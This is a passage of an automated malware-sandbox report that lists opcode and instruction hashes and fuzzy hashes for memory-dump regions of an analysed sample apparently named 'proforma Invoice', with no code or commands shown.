                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5948813924fea09aa305036af19e646bf3829e5e1a45989a80a8714276da96f4
                                                                          • Instruction ID: 2133a8f3c26c8400dc41744889856863f2af28579d891e3ae99b06dd791f522e
                                                                          • Opcode Fuzzy Hash: 5948813924fea09aa305036af19e646bf3829e5e1a45989a80a8714276da96f4
                                                                          • Instruction Fuzzy Hash: 7931B372E01215AFDB29EFA9CC40BAEBBF9EF54750F018426E516E7250D7709E018FA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5f792d9ba4e561656ca94858346d46d4bc7aa1fd0a47df42e1c02885fc7ab934
                                                                          • Instruction ID: f1483aaf6ac142c730509d7d2e9b83d2d4e96367d10c5e5b1d1a119b1039cf22
                                                                          • Opcode Fuzzy Hash: 5f792d9ba4e561656ca94858346d46d4bc7aa1fd0a47df42e1c02885fc7ab934
                                                                          • Instruction Fuzzy Hash: FF31D672B20626BBDB269F99C850B6EBBB5EF44754F200069E905DB352DB70ED018B90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3d76c97488cc591ef2c076bbcde2cf3e589707143df814054d73dbb0801a62bb
                                                                          • Instruction ID: 8e823bf84dd66c544128aea3a3db37b14570be1b705a5781ab414107e6944a6c
                                                                          • Opcode Fuzzy Hash: 3d76c97488cc591ef2c076bbcde2cf3e589707143df814054d73dbb0801a62bb
                                                                          • Instruction Fuzzy Hash: 9A31C832E05712DBC71EDE288880AABBBADEF98654F02452DFD5597310DB32DC2187D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a4c933715f87742125d35be3516fbfd0baa88d477a76282898f88857ae7a312f
                                                                          • Instruction ID: 18f4fdf1450449e4b29e593a3621153618ff65d63d0988b7517b539c82e3e0ea
                                                                          • Opcode Fuzzy Hash: a4c933715f87742125d35be3516fbfd0baa88d477a76282898f88857ae7a312f
                                                                          • Instruction Fuzzy Hash: 16318D716093018FE728CF19C840B2BFBE9FB98B00F05496EE98597351D7B1E954CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                          • Instruction ID: 26fc76137a445e93d81669d9a37d8277e7cb1b33757ad379db59d5548130eda7
                                                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                          • Instruction Fuzzy Hash: FF311C72B00B01AFDB69CF6DDD42B56BBF8AF08650F04092DA5AAC3651E731E904CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0cbfd89fe86d6e562ef3c5d3282c4463ad387678819e56211deb96edf49547c8
                                                                          • Instruction ID: f32b9e29edc966ea7f06c7c4e3facfdf5764dcbb3076f2e1a199b668b3885d85
                                                                          • Opcode Fuzzy Hash: 0cbfd89fe86d6e562ef3c5d3282c4463ad387678819e56211deb96edf49547c8
                                                                          • Instruction Fuzzy Hash: 8131EE71615302CFC716DF19C58095ABBF1FF89208F454AAEE9889B392D332D981CF82
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 21c2e1417b23e6eed8e7c297c63c703edf3ca86d8d2ad7fee29c4d213d7f78e2
                                                                          • Instruction ID: 7b54407221fd3f0bf449d38889919d928bf6f868af0db7626e92ecade784ef92
                                                                          • Opcode Fuzzy Hash: 21c2e1417b23e6eed8e7c297c63c703edf3ca86d8d2ad7fee29c4d213d7f78e2
                                                                          • Instruction Fuzzy Hash: 7231F471B002069FD728EFB8C885B6EBBFAAB90708F10C52AD105D3A50DB30D945CF90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                          • Instruction ID: 55bd7eb0173f328c7cd58f9a4de32f76f888dde1b5457321080ab2aca6c67302
                                                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                          • Instruction Fuzzy Hash: 7221F236E0525BAADB189FB98850BEFBBB9AF54740F068035DE25E7350E370D90087E1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          • Instruction ID: 2d68e466a0888a94095a109e8077bf660843e0560824c78cae60a8b242ac3d55
                                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                          • Instruction Fuzzy Hash: 1F110436A1092ABFDB19CB58CC05BADBBF5FF84210F058269E85597740E671ED41CB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                          • Instruction ID: 83246bf74a41741a5b1e14370644df9983735800956457223f5166123b4c00c6
                                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                          • Instruction Fuzzy Hash: C62106B5A40B059FD3A0CF29C540B52BBF4FB48B10F10892EE98AC7B40E371E854CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                          • Instruction ID: 379c30e4fa5230baba05534a2efbccb97b6c966150d1f022d61944f10b47e14a
                                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                          • Instruction Fuzzy Hash: 5511C631602E05EFE7299FC8C848F56BBE6EF55754F058428E9499B150EB31DC44DB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 10237edb40573141fcc3f9576388940423756a0f1d690605fb6c3e9037b5cd21
                                                                          • Instruction ID: 66fd9de8b31ed7c28f3fde43520406a1ed0d29c56f2e5a519510faedce4754c7
                                                                          • Opcode Fuzzy Hash: 10237edb40573141fcc3f9576388940423756a0f1d690605fb6c3e9037b5cd21
                                                                          • Instruction Fuzzy Hash: AC012B717156496FE71FA26DE844F2B7BDCEF52794F054068F90087241E724DC00C2A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 33e98bed4c374b8d6b7a067052e538008c9bcd145e62bc97cb6f45b3be843d99
                                                                          • Instruction ID: 2f2a847390dc60b37d493c57901b0ee8be3e7fe9f662b599184d45fa4f7c4d21
                                                                          • Opcode Fuzzy Hash: 33e98bed4c374b8d6b7a067052e538008c9bcd145e62bc97cb6f45b3be843d99
                                                                          • Instruction Fuzzy Hash: 62112576200B41AFDB2DCF59D880F567BADEB85B65F044119F9048BA40C33AEC60CF60
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2907a95558097f8d0d4b411ecf612f75428e5be652a1caa03e77db4b7a63aa0e
                                                                          • Instruction ID: 6955f67bb66bbc374eb32d4e51d9717a53296ea58770a915b69c0f3d22e3fe65
                                                                          • Opcode Fuzzy Hash: 2907a95558097f8d0d4b411ecf612f75428e5be652a1caa03e77db4b7a63aa0e
                                                                          • Instruction Fuzzy Hash: 6511A172A00715ABEF25DF69C9C0B5EFBB9FF84754F500459DA11A7200D735AE01CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c1db72397d0ed2997e2783d8e37017baa4c544916a48d7f26cf60216768531b
                                                                          • Instruction ID: 7bd43737e27ff7b73b1b4366afbb05e3fd920e34aa5ef4bb1e5110dff973144e
                                                                          • Opcode Fuzzy Hash: 6c1db72397d0ed2997e2783d8e37017baa4c544916a48d7f26cf60216768531b
                                                                          • Instruction Fuzzy Hash: 8001B575502209AFD729EF19E488F26BBF9FF85718F24816AE1058B260D770EC42CF90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction ID: 4a8465fc58b0cda7fb696d1c21cb208c7b70317c30fe32fff0a9245ac6bd438b
                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction Fuzzy Hash: 4B114C312066C39BE72F971CC844B697BE4FB11B58F1A00A4EE0187742F328C843C622
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction ID: 42f792091d3394b1135c084fe81ce28637444a74598b047a1d2df349b4a1e68b
                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction Fuzzy Hash: 0D014932A42D05AFE72D5F98CC08F567BE9EF45754F058424EA048B260E772DD50CBD0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction ID: e94c3b499b4b0a332f9c3107829d8eee6d177ecbaf88afbb40e42f47dae561c3
                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction Fuzzy Hash: C5012631444721EFCB798F59F841A32BBB5EF557A07008A2DFCA58B281D731D400CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c76a8b67661f673c03ef87fa6a09fa63154933915d0f1f717149f288d97ad2e6
                                                                          • Instruction ID: 6b4c9c5d463007b59554cd6fd1e55900007675f91e6c9c907375ffa0dd25e4c4
                                                                          • Opcode Fuzzy Hash: c76a8b67661f673c03ef87fa6a09fa63154933915d0f1f717149f288d97ad2e6
                                                                          • Instruction Fuzzy Hash: 0E11AD36242241EFDB19EF19CD90F16BBB8FF54B88F2000A9FA059B661D335ED01CA90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2ed33a064b542f8c19c4b943caa8c58eb75b5a4a40c50cbd96c0ceb36e4e0283
                                                                          • Instruction ID: 1969d6680af0971a20a20a6f348af5d0c928c6208a3e7fe9711026c8314da68d
                                                                          • Opcode Fuzzy Hash: 2ed33a064b542f8c19c4b943caa8c58eb75b5a4a40c50cbd96c0ceb36e4e0283
                                                                          • Instruction Fuzzy Hash: B2115E74541229ABDB29AB64CD41FE9B778BB04714F9041D4A314A61E0D7709E91CF85
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                          • Instruction ID: 2f9563f722a538641e5d0e9239538710b623464882a89091fc7fc37939cf8290
                                                                          • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                          • Instruction Fuzzy Hash: 99014C71604125A7EF2DDB15C804BDF7FA4EB40B50F064055BA165B280D774D880C3F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05922580bd0f1d40bc07909731a18cec6af89eafc8b3549e94bcd924d6bc2f86
                                                                          • Instruction ID: ab50081c63ac7d6b2b85dceeaa71127d2f5b7c37353c0562a745e3f687f3859d
                                                                          • Opcode Fuzzy Hash: 05922580bd0f1d40bc07909731a18cec6af89eafc8b3549e94bcd924d6bc2f86
                                                                          • Instruction Fuzzy Hash: 60111773900119ABCB19DB94CC84EDFBBBCEF58258F044166A906A7211EB34AA15CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                          • Instruction ID: eedd20435f42af56c045f9a70bbfc9865c34c8da979d30e1f75713e41bdc8b02
                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                          • Instruction Fuzzy Hash: 9C01F1322002028BEF1D9A2DD880EA6B76ABFC4700F5A45A9ED058F246DB728891C790
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3fbbf2e67758011052cce50468361e3f820e35cacb39bd388d42ed6398a561e5
                                                                          • Instruction ID: c6eff54a601c8764766d093ec56440d2c4d1fc4254dc6404ede719e3eb20e1b8
                                                                          • Opcode Fuzzy Hash: 3fbbf2e67758011052cce50468361e3f820e35cacb39bd388d42ed6398a561e5
                                                                          • Instruction Fuzzy Hash: D111E1326001469FC309CF28D800BA2BBB9FB5A344F088159E9489F325D732EC80CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a10bc2f7256d5250cb2c8bc6d95c03f68777b0b58bd58bde18e6b4e2c6b02770
                                                                          • Instruction ID: 7b2de6cd53e24ab47022333dddb61b43fafb0eb38baeb2142a237c7aa4164c21
                                                                          • Opcode Fuzzy Hash: a10bc2f7256d5250cb2c8bc6d95c03f68777b0b58bd58bde18e6b4e2c6b02770
                                                                          • Instruction Fuzzy Hash: C81118B1A00609ABCB04DFA9D585AAEBBF8FF58250F50406AA905E7351D774EA018BA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                          • Instruction ID: bd8eb9d3263dd7d5c03f71f1bb789e84667cf58485ff03620e24658fdac4f97d
                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                          • Instruction Fuzzy Hash: CF0192321007459BEF2EAAA9D840FA777ADBFD5218F058419E9568B540DB74E402CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4400631b61cd71d2c685a831522079d956f8f31454ca6284670a2f4efa4ab2ee
                                                                          • Instruction ID: ebf8d45b340dd96f0ec894d50c11ea30c3bc5e3920574ef84eb0fdaefd8cce15
                                                                          • Opcode Fuzzy Hash: 4400631b61cd71d2c685a831522079d956f8f31454ca6284670a2f4efa4ab2ee
                                                                          • Instruction Fuzzy Hash: 19116979A0020DABCB09EFA4D850BAE7BB5EF44244F404059E9159B290EB35AE11CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44964ec5e9a9169356dc63afd6f39bb3f292d61a869bed9cccf189ef63e0b031
                                                                          • Instruction ID: 7500bd0385791b07a2b4ff74069f050934a97ff046439a60ae4f3e515001aa5d
                                                                          • Opcode Fuzzy Hash: 44964ec5e9a9169356dc63afd6f39bb3f292d61a869bed9cccf189ef63e0b031
                                                                          • Instruction Fuzzy Hash: C601A7712115457FD719BB79CD84E57B7BCFF946587000629B50583651DB34EC02CAE0
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee4f27d891602d9cd87eecec4e5be55ef353dbd353701992ddbd2e29d2a19e4b
                                                                          • Instruction ID: bb967445206659747365960f3535c75d3444a6bd04a59ffeffc519855ae492c0
                                                                          • Opcode Fuzzy Hash: ee4f27d891602d9cd87eecec4e5be55ef353dbd353701992ddbd2e29d2a19e4b
                                                                          • Instruction Fuzzy Hash: 3501FC32224312DBC328DF69D88896BFBA8FF54664F51422DEA6987280E7309905C7D2
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47a8a4e1755708eea58161583a0c2b255032dc190f0e79c8cfec18f442b03ca0
                                                                          • Instruction ID: ecd4f0a7d4463acc8fc3917be9160d4346be55d7b455aa6f9adc6a6b45fe7dbd
                                                                          • Opcode Fuzzy Hash: 47a8a4e1755708eea58161583a0c2b255032dc190f0e79c8cfec18f442b03ca0
                                                                          • Instruction Fuzzy Hash: 78115B75A00609ABDB19EFA8C844EAE7BB5EB48254F004059B90197340DB34EA11CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 973bc9fc0e2e834e1c02fde83379f6844c5ead1bd990ded324dbed6ea6e9ed1a
                                                                          • Instruction ID: a382eecc5396efc65d741db68edcf8dc27b92cf65ee38a91469ac832bc71172c
                                                                          • Opcode Fuzzy Hash: 973bc9fc0e2e834e1c02fde83379f6844c5ead1bd990ded324dbed6ea6e9ed1a
                                                                          • Instruction Fuzzy Hash: E31139B16187099FC704DF69D845A5BBBE4EF98710F40455AB998D7391E730E900CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6341b34e3033d518c64bb6de79e34dc59f6f3881d8eb4be78c7be258f1160ac
                                                                          • Instruction ID: 87f22bb8d460b8750fed903401075b094ed396b9abaafe95563b4c72d6b46924
                                                                          • Opcode Fuzzy Hash: d6341b34e3033d518c64bb6de79e34dc59f6f3881d8eb4be78c7be258f1160ac
                                                                          • Instruction Fuzzy Hash: 681179B16187089FC314DF69D845A4BBBE4FF99350F40851AB958D73A0E730E900CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                          • Instruction ID: 7d95c561c353c94dcf4da42c54f8c17d154f6d98afa06986844c64733a867de0
                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                          • Instruction Fuzzy Hash: F40128732147429FD725AA59D850F56B7EAFBC2210F044559E7428B650DBB0F841C750
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                          • Instruction ID: b1dee81bf92802af3332001ebee74cee83f96736100e9f95f3075091b7a26758
                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                          • Instruction Fuzzy Hash: 2401B1713065849FE32B862CC948F6A7BE8EF46758F0900A5FA05CB7A1D728DC41C222
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cc28aff52aa27b1a604e714c1a47dddc680f087634258a678ff6c0c609dc76a2
                                                                          • Instruction ID: f001e0db7db791f0a1b91833a76ff24bc062931b92fb0f07c66846986542c5ef
                                                                          • Opcode Fuzzy Hash: cc28aff52aa27b1a604e714c1a47dddc680f087634258a678ff6c0c609dc76a2
                                                                          • Instruction Fuzzy Hash: FE01DF32700A05EBD75CEBAAD8449AEBBA9EF806A4B094029DD01A7644DF70E901C691
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fe356ddab4b668e71d4d5650872301272705ad6a8fc6267ba5f8a0d71ce9bc32
